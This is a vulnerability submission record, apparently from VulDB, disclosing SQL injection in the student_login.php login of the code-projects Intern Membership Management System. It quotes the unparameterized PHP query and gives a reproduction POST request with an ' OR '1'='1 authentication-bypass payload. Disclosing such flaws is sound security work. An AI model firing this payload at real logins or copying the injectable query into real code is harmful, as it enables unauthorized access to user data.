| Title | code-projects Intern Membership Management System published July 27, 2025 SQL Injection |
|---|
| Description | Summary
The login endpoint student_login.php fails to sanitize user-supplied input in the user_name and password parameters.
Root Cause
The application directly interpolates the $_POST['user_name'] and $_POST['password'] values into an SQL query string:
php
$query = mysqli_query($dbconn, "SELECT * FROM registered_users WHERE user_name='$username' and password='$password'");
No escaping or parameterization is applied, allowing arbitrary SQL code injection.
Reproduction
Send a POST request to student_login.php with the following body:
http
POST /intern/student_login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_name=' OR '1'='1&password=anything&submit=Login
The resulting query becomes:
sql
SELECT * FROM registered_users WHERE user_name='' OR '1'='1' AND password='anything'
Since '1'='1' is always true, the login bypasses authentication and grants unauthorized access.
Impact
An unauthenticated remote attacker can bypass login checks, potentially gaining access to student information or administrative functions. If the same pattern exists elsewhere, further data exposure or system compromise may be possible. |
|---|
| Source | ⚠️ https://github.com/shenxianyuguitian/intern-mms-vuln/blob/main/README.md |
|---|
| User | xuanyuesanshi (UID 88126) |
|---|
| Submission | 07/29/2025 10:06 (9 months ago) |
|---|
| Moderation | 07/30/2025 10:38 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 318291 [code-projects Intern Membership Management System 1.0 /student_login.php user_name/password sql injection] |
|---|
| Points | 20 |
|---|